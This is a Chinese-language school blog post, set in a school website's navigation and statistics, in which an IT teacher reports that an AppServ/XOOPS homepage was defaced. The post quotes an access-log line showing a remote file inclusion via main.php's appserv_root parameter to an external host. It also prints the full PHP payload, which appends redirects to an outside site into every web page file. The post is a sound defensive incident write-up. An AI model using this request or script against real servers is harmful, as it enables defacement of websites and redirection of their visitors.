:::
:::
連結裝飾圖示教學資源
==自製教學資源==
◎字音字形網
◎英語學習網
◎全民英檢1057
◎數學測驗網
◎實踐資訊網
◎資教紀錄網
◎檔案倉儲館
◎生日地圖網
◎線上靈籤網
◎班級座號抽籤
◎FWP素材作品網
==資訊課程網站==
◎Windows學習E點通
◎校園XP小學館
◎Windows 7
◎校園Windows7
◎校園word小學館
◎校園word2010
◎校園網際網路館
◎校園PhotoCap
◎PhotoImpact
◎PowerPoint2007
◎PowerPoint2010
◎立威資訊素養館
◎校園資訊素養館
◎電腦基礎樂園
◎Namo_WebEditor
◎自由軟體Kompozer
◎Media@show5
==校內學生專區==
◎fwp教學資源庫
◎NHK影集
◎下課花路米
◎99學年度學生網站
◎五年級學生帳號
連結裝飾圖示資訊服務
◎活動相簿精選
◎實踐NAS
◎實踐NAS申請
◎實踐gmail申請
◎郵件登錄
◎IP分配與設定
◎系統備份還原
◎線上預約教室
==郵件服務==
◎實踐學生專用
◎資教專用Mail
◎實踐知識社群
◎實踐gmail
◎本市教師專用
◎全國師生專用
◎gmail
=防毒與其他服務=
◎學生KMP中心
◎安裝校內防毒
◎安裝教網防毒
◎校內授權軟體
◎備份行政資料
◎KMP校內檔案中心
◎win7與office2010啟用
◎新北市單一認證入口
◎新北市線上報修
◎101年辦公日曆
◎二代公文測試
◎正式二代公文
◎網路電話
◎網路考試
=行政與班級網站=
◎彩虹樂園
◎書香滿校園
◎實踐學生資教網
◎實踐國小校長網
◎實踐國小教務處
◎實踐國小學務處
◎實踐國小總務處
◎實踐國小輔導室
◎實踐國小幼兒園
連結裝飾圖示資安資教
◎實踐資安宣導網
◎資訊課程架構圖
◎資推小組工作計畫
◎資訊教師權利義務
◎電腦耗材支用規定
◎實踐資安宣導舊網
連結裝飾圖示程式創作
◎自動關機程式
◎螢幕捕捉小子第二代
◎圖形自動變網頁
◎快速新增串流影片
◎檔案派送工具
◎班級網站系統
◎無障礙檔案管理系統
◎自動試卷產生器
◎生日地圖解析
◎動畫自動合併播放器
◎快速建立CD TOWER帳號
◎friber符號輸入法
◎作品發表系統
◎獎狀套印excel檔
◎電腦管理_通關密語程式
◎asp線上測驗自動轉換程式
◎虛線數字、字母練習簿
==線上工具服務==
◎特殊中文轉碼
◎中文內碼查詢
◎friber隨機密碼產生器
實踐好話圖示每日好話
月曆裝飾圖示教學日誌

上月 20144 下月

1
.
2
.
3
.
4
.
5
.
6
.
7
.
8
.
9
.
10
.
11
.
12
.
13
.
14
.
15
.
16
.
17
.
18
.
19
.
20
.
21
.
22
.
23
.
24
.
25
.
26
.
27
.
28
.
29
.
30
.
 
網站資訊裝飾圖示網站統計
日期:2014/4/16
開站:2009/1/1
總數:9799273
本月:83616
上月:146173
今日:2647
昨日:5044
運行:1931 天
平均:5074人
會員:2589人
 
會員登入訊息回覆_請輸入正確的帳號與密碼
會員登入系統會員登入

寫新日誌友善列印[友善列印]
目前位置
目前位置::::[首頁C)] >appserv程式漏洞_首頁被竄改
 
線上日誌
  
     
 
部落格文章與迴響列表
撰寫時間 2007/11/26 下午 02:00:29(星期一)
日誌作者 蔡玉貴
文章標題 appserv程式漏洞_首頁被竄改
日誌內容
使用appserv要注意,AppServ整合了Apache/PHP/MySQL,可以讓使用windows作業系統者可以架設網站,相當便利,但最近發現敝校某台用windows+appserv架設的xoops網站首頁被竄改,經查apache\logs中的access.log發現,其中的main.php檔,會被用來成為竄改網站首頁的橋樑。



記錄檔節錄如下:



212.241.221.23 - - [25/Nov/2007:09:03:01 +0800] "GET /appserv/main.php?appserv_root=http://usuarios.arnet.com.ar/larry123/ka.txt? HTTP/1.1" 200 766 "-" "Mozilla/3.0 (compatible; Indy Library)"



程式會導向以下文字檔,主要作用是將網站中所有網頁相關檔案於程式碼最後加上自動轉址到http://www.rapimusica.com/這個網站。



http://usuarios.arnet.com.ar/larry123/ka.txt

<?

if(!isset($_SERVER[’DOCUMENT_ROOT’]))

{

$n = $_SERVER[’SCRIPT_NAME’];

$f = ereg_replace(’\\\\’, ’/’,$_SERVER["PATH_TRANSLATED"]);

$f = str_replace(’//’,’/’,$f);

$_SERVER[’DOCUMENT_ROOT’] = eregi_replace($n, "", $f);

}

$codigo = "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=http://www.rapimusica.com/\">\n";

$peache = ’<? header("Location: http://www.rapimusica.com/"); ?>’;

$directorio = $_SERVER[’DOCUMENT_ROOT’];



foreach (glob("$directorio/*.php") as $archivo) {

$fp=fopen($archivo,"a+");

fputs($fp,$codigo);

}

foreach (glob("$directorio/*.htm") as $archivh) {

$fp=fopen($archivh,"a+");

fputs($fp,$codigo);

}

foreach (glob("$directorio/*.html") as $archivl) {

$fp=fopen($archivl,"a+");

fputs($fp,$codigo);

}

foreach (glob("$directorio/*.php") as $archivo) {

$fp=fopen($archivo,"a+");

fputs($fp,$peache);

}

?>
部落格文章分類:資訊相關
上一篇文章[上一篇:阿玄校長網音樂點播]
下一篇文章[下一篇: 實踐資訊教育逐見成效]
[我要迴響[R]]
 
     
Copyright (C)2009 Shihjian Elementary School,Banciao City,Taipei County. All rights reserved.
新北市板橋區實踐國民小學 220板橋區實踐路93巷51號 Tel:2953-1233 Fax:2958-4089   系統設計:[蔡玉貴]
通過AAA優先等級無障礙網頁檢測[後台管理][FWP6.2]